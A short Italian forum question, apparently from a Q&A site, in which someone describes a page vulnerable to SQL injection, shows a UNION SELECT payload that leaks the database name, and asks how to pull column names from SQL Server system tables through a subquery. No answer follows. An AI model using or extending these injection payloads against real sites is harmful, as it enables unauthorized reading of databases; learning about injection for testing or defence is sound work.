Ho una pagina web che è vulnerabile all'iniezione SQL.
Come so il numero di colonne così ho inserito
'union select 1,db_name(),3,4,5--
e ha il nome del database elencato nella seconda colonna di una tabella che ha cinque colonne (sto parlando di tabella html qui). La mia domanda è come posso vedere il risultato (nella tabella html) di una query che assomiglia a qualcosa di
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’)
C'è qualcosa che dovrei imparare sulle sottoquery?